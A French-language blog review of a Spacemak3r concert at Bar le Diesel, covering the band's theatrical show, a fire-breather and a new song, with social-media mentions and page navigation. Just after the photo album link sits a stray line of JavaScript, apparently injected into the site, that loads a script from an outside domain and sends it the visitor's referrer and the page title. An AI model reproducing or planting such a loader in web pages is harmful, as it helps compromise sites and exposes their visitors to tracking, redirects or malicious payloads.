Vous avez manqué Spacemak3r au bar le Diesel hier soir? Et bien… tant pis.


Facebooktwitterredditpinterestlinkedinmail

Hier avait lieu le concert de Spacemak3r que tout l’monde attendait avec impatience depuis leur annonce officiel de leur prochain concert. C’est avec un peu de retard que le groupe fit leur apparition sur scène. Cela n’a pas empêché à ceux qui étaient venus, de les attendre avec impatience. Dès leur entrée sur scène, cela n’a pris qu’une fraction de seconde pour survolter la place qui au départ était venu voir le groupe se produire.

Le Spacemak3r et toute sa troupe était vraiment très en forme. Malgré la place qui était restreint pour le groupe. Ils ont quand même livré la marchandise à la hauteur de leur habitude. Nous avons eu le droit au cracheur de feu à l’intérieur et toute l’équipe pour faire l’animation durant le concert. Le groupe c’est vraiment mêler à la foule ce qui a plus énormément à tous ceux qui était sur place. Le Clown, Spacemak3r, et l’autre que j’oublie toujours son nom, que voulez-vous ils sont quand même 12 dans ce groupe, ont su s’amuser et même à arracher une partie du petit mur du plafond. Cela n’a rien ralentis à l’énergie que le groupe installe en concert.

Fidèle à leur habitude théâtrale, nous avons eu le droit à du Spacemak3r pur et dur comme nous sommes si bien habitué. Les gars et la fille car bien sûr il y en a juste une dans le groupe, il ne faut surtout pas l’oublier pauvre petite car, elle est souvent suivie par de drôle de monstres qui la harcèle malicieusement dans son monde imaginaire de petite gamine.

Nous avons eu le droit à une nouvelle pièce qui sortira sur leur prochain album qui s’intitule « Happy Birtday ». Préparez-vous car, cette pièce s’annonce dans la belle continuité de ce que nous connaissons de Spacemak3r. Le groupe prévoit un autre show bientôt. Alors vous êtes avertis d’avance et vous n’aurai cette fois-ci, aucune excuse de ne pas aller les voir une fois en concert.

Dans l’ensemble, ce fut une soirée mémorable en sensation de toute sorte et souhaitons-le se reproduira plus souvent durant la période estival. Vous pouvez les suivres sur leur MySpace et Facebook et ce que Michael nous a dit sur leur site web bientôt. D’ici le prochain concert, Spacemak3r vous dit! Gna GNa Gna

Leur album photo ici Spacemak3r

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous C'est la fête avec les Black Eyed Peas
Next Le Retour de nos idoles édition 2011

No Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *